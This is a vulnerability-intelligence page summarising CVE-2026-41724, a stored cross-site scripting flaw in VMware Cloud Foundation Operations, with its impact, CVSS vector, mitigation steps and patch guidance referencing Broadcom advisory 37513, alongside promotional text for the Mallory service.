Skip to main content
Mallory
Back to vulnerabilities
High

Stored XSS in VMware Cloud Foundation Operations

IdentifiersCVE-2026-41724CWE-79

CVE-2026-41724 is a stored cross-site scripting vulnerability affecting VMware Cloud Foundation Operations. According to the provided advisory content, the product contains multiple stored XSS flaws that can be triggered when a malicious actor with privileges to create policies, views, or text widgets injects script content into the application. When that stored content is later rendered in the VMware Cloud Foundation Operations interface, the injected script may execute in a victim user's browser and can be leveraged to perform administrative actions within the platform.

Share:
For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial
ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation can allow execution of attacker-controlled script in the context of a user's browser session within VMware Cloud Foundation Operations, enabling administrative actions to be performed through that session. The provided CVSS v3.1 vector (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) indicates high potential impact to confidentiality, integrity, and availability.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, limit the ability to create or modify policies, views, and text widgets to only highly trusted administrators, review existing user-created content for injected script payloads, and monitor administrative dashboards and related interfaces for suspicious stored content. Reduce exposure by restricting access to the management interface and prioritizing patch deployment per the Broadcom advisory.

Remediation

Patch, then assume compromise.

Broadcom provided security updates to remediate the issue. The supplied content states that administrators should apply the latest patches immediately and identifies VMware Aria Operations version 8.18.6 as a fixed version in the related product line. Organizations should audit affected VMware Cloud Foundation Operations and related deployments and upgrade to vendor-fixed releases referenced in Broadcom advisory 37513.
PUBLIC EXPLOITS

Exploits

No public exploits tracked yet. Mallory keeps watching.

VALID 0 / 0 TOTALView more in app

No public exploit code observed for this vulnerability.

ACTIVITY FEED

Recent activity

8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

8 SOURCESView more in app
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
Start free trial
Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware

Malware families riding this exploit, with evidence and IOCs.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity6

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES
MITRE CVE
cve.org · CVE-2026-41724
NVD
nvd.nist.gov/vuln/detail/CVE-2026-41724
MITRE CWE · CWE-79
cwe.mitre.org
support.broadcom.com
support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37513